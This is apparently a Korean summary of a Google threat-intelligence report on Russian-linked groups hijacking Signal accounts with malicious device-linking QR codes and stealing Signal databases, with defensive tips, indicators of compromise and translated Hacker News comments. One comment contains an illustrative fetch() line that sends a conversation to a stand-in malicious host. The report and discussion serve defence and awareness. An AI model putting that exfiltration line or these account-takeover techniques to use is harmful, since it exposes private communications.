1P by GN⁺ | ★ favorite | 댓글 2개
  • 러시아 정보기관의 관심 대상이 쓰는 Signal 계정이 집중 표적이 되며, 민감한 정부·군사 통신을 노린 계정 침해 시도가 늘어남
  • 가장 널리 쓰인 수법은 정상 Linked Devices 기능을 악용해 악성 QR 코드를 스캔하게 만들고, 이후 메시지를 공격자 기기로 실시간 동기화하는 방식임
  • UNC5792는 가짜 Signal 그룹 초대, UNC4221은 Kropyva 테마 피싱 키트와 가짜 보안 알림, APT44는 포획 기기 접근을 통해 기기 연결을 노림
  • APT44, Turla, Belarus 연계 UNC1151 등은 Android·Windows 환경에서 Signal 데이터베이스나 Signal Desktop 메시지·첨부파일 탈취 기능도 운용함
  • Signal에만 국한된 문제가 아니며 WhatsApp과 Telegram도 유사하게 표적이 되므로, 앱 업데이트와 연결 기기 점검, QR 코드 주의, 강한 화면 잠금이 필요함

Signal 계정을 노리는 러시아 연계 활동

  • Google Threat Intelligence Group(GTIG)은 여러 러시아 국가 연계 위협 행위자가 Signal Messenger 계정 침해 시도를 늘리고 있다고 확인함
  • 주요 표적은 러시아 정보기관의 관심 대상이 되는 개인들이며, 우크라이나 재침공 이후 민감한 정부·군사 통신에 접근하려는 전시 수요가 활동을 키움
  • Signal은 군인, 정치인, 기자, 활동가, 고위험 커뮤니티가 쓰는 보안 메신저라서 감시·첩보 활동의 고가치 표적이 됨
  • 유사한 위협은 WhatsAppTelegram 같은 다른 인기 메신저로도 확장되며, 러시아 연계 그룹들이 비슷한 기법을 적용함
  • Signal의 최신 AndroidiOS 릴리스에는 유사 피싱 캠페인 방어를 돕는 강화 기능이 포함됨
    • 사용자는 최신 버전으로 업데이트해야 해당 기능을 사용할 수 있음

Linked Devices 기능 악용 방식

  • 가장 새롭고 널리 쓰인 기법은 Signal의 정상 기능인 linked devices 악용임
  • Signal은 여러 기기에서 동시에 쓰기 위해 추가 기기 연결 시 보통 QR 코드 스캔을 요구함
  • 위협 행위자는 피해자가 스캔하면 공격자 제어 Signal 인스턴스가 피해자 계정에 연결되는 악성 QR 코드를 제작함
  • 연결에 성공하면 이후 메시지가 피해자와 공격자에게 실시간으로 동기 전달되어, 전체 기기 침해 없이도 보안 대화를 계속 엿볼 수 있음
  • 원격 피싱에서 악성 QR 코드는 주로 다음처럼 위장됨
    • Signal 그룹 초대
    • 보안 알림
    • Signal 웹사이트의 정상 기기 페어링 안내
  • 더 맞춤화된 원격 피싱에서는 우크라이나군이 쓰는 특수 애플리케이션처럼 보이는 피싱 페이지에 악성 기기 연결 QR 코드가 삽입됨
  • 근접 접근 작전에서도 같은 방식이 쓰임
    • APT44는 전장에 전개된 러시아군이 포획한 기기의 Signal 계정을 공격자 제어 인프라에 연결해 후속 악용할 수 있게 함
  • 새로 연결된 기기를 통한 계정 침해는 중앙화된 기술 기반 탐지와 방어가 부족해 낮은 신호의 초기 접근이 되기 쉬움
    • 성공 시 침해가 장기간 눈에 띄지 않을 위험이 큼

UNC5792: 변조된 Signal 그룹 초대

  • UNC5792는 러시아 첩보 활동으로 의심되는 클러스터이며, CERT-UA의 UAC-0195와 일부 겹침
  • 이 그룹은 Signal의 정상 group invite 페이지를 변조해 피싱 캠페인에 사용함
  • 정상 흐름에서는 사용자를 Signal 그룹으로 리디렉션하지만, 변조된 페이지는 피해자의 Signal 계정에 공격자 제어 기기를 연결하는 악성 URL로 보냄
  • 공격자 제어 인프라는 합법적인 Signal 그룹 초대처럼 보이도록 구성됨
  • 가짜 그룹 초대의 JavaScript는 일반적인 Signal 그룹 참가 리디렉션 대신 sgnl://linkdevice?uuid= 형태의 Signal 신규 기기 연결 URI를 포함한 악성 블록으로 대체됨
  • 예시 도메인으로 signal-groups[.]tech가 확인됨

UNC4221: 맞춤형 Signal 피싱 키트

  • UNC4221은 CERT-UA가 UAC-0185로 추적하는 러시아 연계 위협 행위자이며, 우크라이나 군인이 쓰는 Signal 계정을 적극 표적화함
  • 이 그룹은 우크라이나군이 포병 유도에 사용하는 Kropyva 애플리케이션 구성요소처럼 보이는 맞춤형 Signal 피싱 키트를 운용함
  • UNC4221도 UNC5792와 비슷하게 신뢰할 수 있는 연락처의 Signal 그룹 초대처럼 기기 연결 기능을 숨김
  • 관찰된 피싱 키트 변형은 여러 형태임
    • 피해자를 Signal이 제공한 정상 기기 연결 안내처럼 보이는 2차 피싱 인프라로 리디렉션하는 피싱 웹사이트
    • 기본 Kropyva 테마 피싱 키트에 악성 기기 연결 QR 코드를 직접 삽입한 웹사이트
    • 2022년 초기 작전에서 Signal 정상 보안 알림처럼 보이도록 만든 피싱 페이지
  • 예시 도메인과 페이지는 signal-confirm[.]site, teneta.add-group[.]site, signal-protect[.]host 등임
  • UNC4221은 Signal 표적화의 핵심 구성요소로 PINPOINT라는 경량 JavaScript 페이로드도 사용함
    • PINPOINT는 브라우저의 GeoLocation API로 기본 사용자 정보와 위치 데이터를 수집함
  • 향후 유사 작전에서는 보안 메시지와 위치 데이터가 함께 표적이 될 가능성이 큼
    • 특히 표적 감시 작전이나 재래식 군사작전 지원 맥락에서 두 데이터가 함께 노려짐

Signal 메시지 탈취를 위한 러시아·벨라루스 연계 활동

  • 여러 알려진 지역 위협 행위자는 피해자 계정에 추가 기기를 연결하는 방식 외에도 Android와 Windows 기기에서 Signal 데이터베이스 파일을 훔치는 기능을 운용함
  • APT44는 WAVESIGN이라는 경량 Windows Batch 스크립트를 사용함
    • 피해자 Signal 데이터베이스에서 주기적으로 Signal 메시지를 조회함
    • 최근 메시지를 Rclone으로 유출함
  • 2023년 우크라이나 Security Service of Ukraine(SSU)와 영국 National Cyber Security Centre(NCSC)가 보고한 Infamous Chisel Android 악성코드는 Sandworm에 귀속됨
    • Android 기기에서 Signal을 포함한 여러 메신저 앱의 로컬 데이터베이스 등 파일 확장자 목록을 재귀적으로 검색하도록 설계됨
  • Turla는 러시아 FSB Center 16에 귀속된 러시아 위협 행위자임
    • 침해 후 Windows 환경에서 Signal Desktop 메시지를 반출 준비하는 경량 PowerShell 스크립트를 운용함
  • Belarus 연계 UNC1151은 Robocopy 명령줄 유틸리티를 사용함
    • Signal Desktop이 메시지와 첨부파일을 저장하는 파일 디렉터리 내용을 나중에 유출할 수 있도록 스테이징함

보안 메신저 사용자가 적용할 방어 조치

  • 여러 위협 행위자의 Signal 집중은 보안 메신저 애플리케이션에 대한 위협이 단기적으로 심화될 수 있음을 보여줌
  • 상업용 스파이웨어 산업 성장, 분쟁 지역에서 쓰이는 모바일 악성코드 변종 증가와 맞물려 민감한 통신을 감시하려는 공격적 사이버 역량 수요가 커지고 있음
  • 위협은 피싱과 악성코드 전달 같은 원격 사이버 작전에만 머물지 않음
    • 공격자가 표적의 잠금 해제된 기기에 잠시 접근할 수 있는 근접 접근 작전도 중요한 위험임
  • Signal뿐 아니라 WhatsApp과 Telegram도 여러 러시아 연계 그룹의 최근 표적 우선순위에 포함됨
    • Microsoft Threat Intelligence는 COLDRIVER, UNC4057, Star Blizzard가 WhatsApp 계정 침해를 위해 Linked Devices 기능을 악용하려 한 캠페인을 최근 블로그 글에서 다룸
  • 정부 지원 침입 활동의 표적이 될 수 있는 사용자는 다음 방어 습관을 적용해야 함
    • 모든 모바일 기기에 화면 잠금을 활성화하고, 대문자·소문자·숫자·기호를 섞은 길고 복잡한 비밀번호를 사용함
    • Android는 영숫자 비밀번호를 지원하며, 숫자 PIN이나 패턴보다 훨씬 높은 보안을 제공함
    • 운영체제 업데이트를 가능한 한 빨리 설치하고 Signal과 다른 메신저 앱을 항상 최신 버전으로 유지함
    • Google Play Services가 있는 Android 기기에서 기본 활성화되는 Google Play Protect를 켜둠
    • 앱 설정의 “Linked devices” 섹션에서 승인되지 않은 기기가 있는지 정기적으로 점검함
    • 소프트웨어 업데이트, 그룹 초대, 기타 알림처럼 보이면서 즉각 행동을 유도하는 QR 코드와 웹 리소스에 주의함
    • 가능한 경우 지문, 얼굴 인식, 보안 키, 일회성 코드 같은 2단계 인증을 사용해 계정 로그인 또는 새 기기 연결을 검증함
    • 표적 감시나 첩보 활동이 우려되는 iPhone 사용자는 공격 표면을 줄이기 위해 Lockdown Mode 활성화를 고려함

침해 지표와 관찰된 기법 요약

  • 조직의 헌팅과 식별을 돕기 위해 등록 사용자를 위한 GTI Collection에 침해 지표가 포함됨
  • 관련 침해 지표 예시는 다음과 같음
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, 변조된 그룹 초대 HTML 코드 예시
    • UNC5792 가짜 그룹 초대 피싱 페이지: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • UNC4221 기기 연결 안내 피싱 페이지: signal-confirm[.]site, confirm-signal[.]site
    • UNC4221 가짜 Signal 보안 알림: signal-protect[.]host
    • UNC4221 가짜 Kropyva 그룹 초대: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, APT44가 제공한 동적 생성 기기 연결 QR 코드
    • APT44 WAVESIGN Batch 스크립트: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • 관찰된 위협 행위자별 전술과 기술은 다음과 같음
    • UNC5792: 가짜 그룹 초대를 사용한 원격 피싱으로 피해자 Signal 메시지를 공격자 제어 기기에 페어링함
    • UNC4221: 가짜 군사용 웹 애플리케이션과 보안 알림을 사용한 원격 피싱으로 피해자 Signal 메시지를 공격자 제어 기기에 페어링함
    • APT44: 물리적으로 접근한 기기를 악용해 피해자 Signal 메시지를 공격자 제어 기기에 페어링함
    • APT44: Android 악성코드 Infamous Chisel로 Signal 데이터베이스 파일 유출을 노림
    • APT44: Windows Batch 스크립트로 최근 Signal 메시지를 Rclone을 통해 주기적으로 유출함
    • Turla: Windows 환경 침해 후 Signal Desktop 데이터베이스 탈취 활동을 수행함
    • UNC1151: Robocopy로 Signal Desktop 파일 디렉터리를 반출 준비함

댓글과 토론

취약한 것은 사실이지만 그룹 채팅은 제대로 암호화도 하지 않는 텔레그램이 보안 쪽으로 비판한다는 것 자체가 웃기네요.

Hacker News 의견들
  • Signal처럼 연결된 기기 workflow를 가진 앱은 꽤 오래전부터 위험했음
    작년에 Telegram이 Signal을 깎아내릴 때도 이 점을 짚었고(https://news.ycombinator.com/context?id=40303736), Signal의 연결된 기기 구현은 오래전부터 문제가 있었다고 봄: https://eprint.iacr.org/2021/626.pdf
    실제 공격 사례가 공개 문헌에 나오기까지 이렇게 오래 걸린 게 오히려 놀라움. Signal이 이 공격을 자기들의 위협 모델 밖으로 본 것도 도움이 안 됨. 해당 논문에 따르면 Signal은 2020년 10월 20일 제보를 받고 10월 28일 답하면서, 장기 비밀키 손상을 적대자 모델에 포함하지 않는다고 했음

    • 제대로 읽은 게 맞다면 이 공격은 공격자가 사용자 기기에만 저장된 개인 키(IK) 와 사용자 비밀번호를 이미 갖고 있다고 가정함
      그렇다면 피해자 기기 중 하나에 물리적으로 접근했거나 다른 백도어가 있어야 하는데, 그 정도면 이미 진 것 아닌가 싶음. 틀렸다면 정정해 달라. 물리 하드웨어 보안과 피싱 방지가 여전히 핵심으로 보임
    • 그 논문의 공격은 Signal 프로토콜의 다른 키를 파생하는 데 쓰이는 사용자의 장기 개인 신원 키(IK) 가 이미 탈취됐다고 가정함
      실험실 밖에서 그걸 얻는 방법은 대체로 사용자의 기기에 루트 접근을 얻거나, 최근 채팅 백업을 탈취하는 것뿐임. Google이 발견한 캠페인은 피싱에 가까워서 기술적으로는 덜 심각하지만, 사용자가 위험한 행동을 하는 중이라고 어떻게 경고할지는 사용성 보안 전체가 얽힌 난제임. 새 연결 기기를 추가할 때 메시지 기록과 최근 45일 첨부파일까지 복사되기 시작하면 Signal에서 더 중요해질 문제임
    • 연결된 기기 기능을 쓰지 않으면 이 공격 표면도 줄어드는지 궁금함
  • 요즘 더 많이 느끼는 건, 종단 간 암호화는 결국 클라이언트를 최종 사용자가 직접 빌드하고 검증할 수 있어야 한다는 점임
    암호화된 CRDT 기반의 암호화 AI 채팅 서비스를 만들고 있는데, 렌더링 쪽에 fetch 한 줄이나 분석 추적기만 넣어도 프로토콜이 약속한 보안은 무용지물이 됨. 더 나아가 렌더링이 실행되는 운영체제까지 신뢰해야 함
    클라이언트를 오픈소스로 만들고 재현 가능하게 빌드하게 해도 iOS Store를 통해 배포해야 하며, 게시 과정에서 무슨 일이든 생길 수 있음. iOS를 예로 든 건 자체 빌드 앱을 올리기가 특히 까다롭기 때문임. 다자간 채팅이면 상대편도 같은 과정을 거쳐야 함
    온갖 멋진 프로토콜과 최고의 전송 구간 암호화를 써도 결국 전부 신뢰의 문제임. Signal 같은 걸 쓰면 완전히 안전한 환경이라는 착각 아래 오히려 감시 표적이 되는 게 아닌지 걱정됨. 정부 기관이 감시하려 한다면 숨길 게 가장 많을 Signal 사용자에게 자원을 집중할 것 같음
    때로는 암호화 저장소 말고는 다 무의미하게 느껴짐. 논의 대부분이 수학 중심의 보안 프로토콜 타당성에 머무는 것도 이상함. 렌더링 계층에서 fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}) 한 줄이면 다 우회될 수 있는데, 이에 대한 생각이 궁금함

    • 결국 CPU 실리콘이 되는 모래부터 운영체제, 패킷 전달 방식까지 전체 파이프라인을 통제하지 못한다면 어딘가에는 신뢰의 뿌리를 둬야 함
      신뢰를 없애는 건 불가능해 보이고, 무엇을 신뢰할지 옮기거나 추상화 뒤에 숨길 뿐임. 앞으로 더 중요해질 건 어느 정도 신뢰한 주체가 악의적으로 행동하는지 명확히 증명하고 책임지게 만드는 장치들임
      예를 들면 중간자 공격을 막는 인증서 투명성 로그, 받은 바이너리가 공개 오픈소스 코드와 맞는지 확인하는 재현 가능한 빌드, WhatsApp/Signal/iMessage에서 NSA 키가 아니라 기대한 공개 키를 받는지 확인하는 키 투명성 같은 것들임
    • 암호화 방식의 이론적 지위에 점점 집착하고, 여러 결과의 실제 위험은 뒤로 밀리는 점에서 수레가 말 앞에 가는 느낌이 있음
      너무 안전하려는 시스템은 사용자가 자기 메시지를 읽지 못하게 만들 수 있고, 결국 더 덜 안전한 시스템으로 밀어낼 수 있음. Matrix에서도 로그아웃하면 메시지를 영구히 놓칠 수 있다는 점을 클라이언트가 명확히 알리지 못해 문제가 됐음
      완전한 전방 비밀성 같은 강한 요구사항 일부는 실용적으로 사용자가 메시징에서 원하는 것과 충돌할 수 있음. 사용자가 원하는 건 “내 메시지는 언제든 내가 볼 수 있고, 남은 절대 볼 수 없다”인데 이는 매우 어렵다. 보안과 비밀번호 재설정, 휴대폰 분실 복구 사이에는 근본적 긴장이 있음
      가능한 결과를 사람들이 완전히 이해한다면 상당수는 가장 강한 종단 간 암호화를 원하지 않을 수도 있음. 대신 “남이 내 메시지를 보면 평생 감옥” 같은 강력한 법적 보장을 원할 수 있음. 최고 수준의 기술 보안을 원하는 사람도 있지만, 그 우선순위에 맞춰 설계하면 그 절충을 받아들이지 않는 사용자에게 역풍이 생길 수 있음
    • 종단 간 암호화와 클라이언트-서버 암호화의 차이를 걱정할 정도로 제대로 안전해야 하는 걸 iOS와 Google Play Services 위에 만드는 건 꽤 무의미하다고 봄
      그 정도 보안을 신경 쓰는 사람은 iPhone 말고 다른 걸 쓰려고 노력할 것임. Signal 지지자들이 마음에 안 드는 암호 시스템 사용자들을 LARPer라고 부르는 건 전형적인 투사처럼 보임. 미국 정부에서 일하는 경우 정도를 빼면 Signal이 실제로 맞는 위협 모델이 뭔지 잘 모르겠음
      학계 암호 연구자들이 수학적 알고리즘에 집중하는 가로등 효과도 분명 있음. 요즘은 보안 연구비를 받을 수 있는 범위가 조금 넓어져 종단 간 메시징 프로토콜의 장난감 모델까지는 포함되지만, 실제로 중요한 인간 대 인간 전체 구간까지 포괄하기에는 여전히 부족함
    • 말하는 것의 일부는 증명(attestation) 이라고 부르기도 함
      기본적으로 신뢰하는 루트가 서명해, 상호작용하는 실체가 어떤 전화기+운영체제+앱에서 왔는지 의심 없이 확인해 주는 방식임
      Android는 이를 갖고 있고, 예를 들어 잠긴 부트로더와 Google 서명, Google 운영체제가 실행 중인지 제3자에게 확인해 줄 수 있음. 이론상 다른 신뢰 체인을 두고 Google 폰+Lineage OS 같은 “원본” 소프트웨어를 원격 상대가 받아들이게 하는 것도 가능함
      앱도 운영체제가 접근 가능한 앱 서명을 검증해 필요하면 원격 상대에게 제공할 수 있음. Google 같은 단일 주체를 맹신하지 않는 완전히 투명한 증명 산출물은 서명 신뢰 루트 대신, 검증 대상 구성요소의 해시와 바이너리를 담은 원장을 쓸 수 있음
      모두 기술적으로 가능하지만, 오늘날 실제로 가능한 방식으로 구현되진 않았음. 관심이 충분하면 결국 구현될 것이라고 봄
    • 지금 제기한 문제들은 분명 존재하지만, 10~15년 전 통신 상태를 잊고 있는 것 같음
      그때는 아무것도 암호화되지 않았고, 공용 와이파이에서 뭘 하는 건 러시안룰렛이나 다름없었으며, 신호정보 기관들은 황금기를 누렸음. 당시에는 네트워크 암호화가 더 우선순위가 높았음
  • 기사에 명확히 쓰여 있진 않지만, 이해한 바로는 공격 중 하나의 첫 단계가 전사한 군인의 스마트폰을 가져가는 것임

    • 기사에서는 악성 QR 코드를 만들어 피해자가 Signal에 공격자 기기를 연결하게 만든다고 함
      성공하면 이후 메시지가 피해자와 공격자에게 실시간으로 동시에 전달됨
    • 진지한 얘기라면, 군인에게 스마트폰이 표준 장비가 되는 문제를 제기함
      하지만 스마트폰은 별도 훈련 없이도 쓸 수 있는 강력한 컴퓨팅·통신 플랫폼을 모든 군인에게 제공함. 문제는 상위 댓글의 위험까지 포함해 어떻게 안전하게 만들지임
      러시아 정보기관도 효과적으로 악용하지 못할 만큼 충분히 보호하는 방법을 누군가는 연구하고 있을 것 같음. 그런 해법이 널리 퍼지면 민간인 프라이버시에도 잘 적용될 수 있음. 우크라이나 민간인 휴대폰을 러시아 공격자로부터 보호하는 것도 나쁜 생각은 아님
    • 군인은 휴대폰 휴대가 허용되지 않음
  • QR 코드 한 번 스캔하는 것만으로 기기 연결이 되는 걸 말하는 거라면, 그게 구멍 아닌가 싶음
    코드만 스캔해서 기기가 연결되면 안 되고, “예, 이 기기에 연결하겠습니다” 같은 수동 확인이 있어야 함. 그러면 그룹 초대 코드라고 생각하고 스캔했더라도 실제로는 아니라는 걸 알아차릴 수 있음. 물론 여전히 사용자가 알아차려야 하지만, “그룹 참여 코드인 줄 알고 스캔했더니 조용히 다른 기기가 연결됨”보다는 의미 있는 개선임

    • Signal은 비기술 사용자를 위해 설계됐다는 걸 기억해야 함
      많은 사용자는 QR 코드, 링크, 연결 같은 걸 이해하지 못하고 깊게 생각하지도 않음. 즉각적이고 본능적으로 추측해서 누르며, 종종 화면에서 치우고 하던 일로 돌아가기 위해 클릭함. 확인 절차가 없다고 볼 근거가 있는지는 모르겠고, Signal 문서를 보면 알 수 있을 듯함
  • 관련 기사: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    https://news.ycombinator.com/item?id=43103692를 통해 봤지만 거기엔 댓글이 없음

  • 좋은 소식은 표적이 되는 이유가 있다는 것임. Signal이 아직 효과적이라는 뜻임

  • Signal이 손상됐다고 말하려는 목소리가 많지만, 거의 모든 경우 그쪽이 Signal보다 오픈소스성이 낮다는 점을 봐야 함
    Signal은 웹 규모 회사가 되면서도 인권을 지키기 위해 최선을 다하고 있음. 개인의 존엄은 중요함. 단순한 대화가 아님

    • “누가” 손상시켰다는 건지 헷갈림. 러시아인지, 미국 정보기관인지 모르겠음
      Signal Foundation 웹사이트에서 이사회 구성원을 잠깐 봤는데, Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, U.S. Department of State의 Foreign Affairs Policy Board 같은 표현이 보였음
      이런 사람들은 정보기관 세계의 일부처럼 들림. 오픈소스 메시징 앱인 Signal 이사회에서 정확히 뭘 하는 건지 궁금함. 단순한 대화가 아니라는 점에는 동의함
    • Telegram은 특히 더 나쁨. 자체 암호화와 자체 프로토콜을 쓰고, 기본적으로 종단 간 암호화를 전혀 제공하지 않으며, 모든 걸 서버에 평문으로 저장함
    • 전반적으로 허위정보가 많은 까다로운 환경이고, Signal처럼 가치 있는 대상은 특히 더 그럼
      Signal이 안전하다면 프라이버시를 공격하는 쪽은 사람들이 Signal이 손상됐다고 믿고 다른 걸 쓰길 원할 것임. 안전하지 않다면 반대로 사람들이 Signal이 안전하다고 믿길 원할 것임
      해법은 잠재적 허위정보 출처, 특히 소셜 미디어의 임의 사용자들을 완전히 무시하는 것이라고 봄. HN도 포함됨. 사회적 중심이 그런 곳에 있을 때는 어렵고, 스스로를 배제해야 함. 합법적이고 신뢰할 수 있는 목소리로 제한해야 함
    • “웹 규모”라는 말을 아직도 진지하게 쓰는 사람이 있는 줄 몰랐음
      “MongoDB는 웹 규모입니다. 켜기만 하면 바로 확장됩니다”
  • 설정 메뉴에서 예상치 못한 연결된 기기가 있는지 확인할 수 있음

    • Signal이 연결된 기기를 항상 사용자 인터페이스에 직접 보여주는 게 좋을지 궁금함
      “활성 연결 기기 3대” 같은 작은 아이콘을 표시하는 식이면 됨
    • 좋은 생각임. QR 코드를 보내겠음
  • 일부 도메인을 제공했지만 전부 등록된 건 아님
    예를 들어 signal-protect[.]hostkropyva[.]site는 사용 가능하고, signal-confirm[.]site는 우크라이나에 등록돼 있음. 일부는 러시아에 등록돼 있음
    전쟁 중인 국가는 어느 편이든 믿으면 안 됨. A는 B를 탓하고 B는 A를 탓하지만, 양쪽 모두 자기 의제가 있음

    • signal-confirm[.]site가 우크라이나에 등록됐다고 해도, WHOIS 데이터는 보통 가짜인 경우가 많아서 그걸 근거로 삼기 어렵다
      러시아는 이런 일에 우크라이나를 포함한 이웃 국가의 탈취된 인증 정보나 SIM 카드도 쓰는 것으로 알려져 있음
    • 악성 행위자의 도메인이 우크라이나에 등록됐다고 해서 자동으로 우크라이나의 이익을 위해 움직이거나 우크라이나 당국이 알고 있다고 보는 건 실수임
      안타깝지만 러시아 국가 행위자들도 우크라이나 내부에서 활동하는 데 문제가 없음. 여기에 돈을 더 주는 쪽을 따르는 혼란스러운 범죄자들, 러시아가 일시 점령한 지역과 우크라이나를 매일 오가는 사람들까지 더하면 금방 복잡해짐
    • 등록되지 않은 도메인도 예를 들어 페이로드 분석에서 발견됐다면 침해 지표가 될 수 있음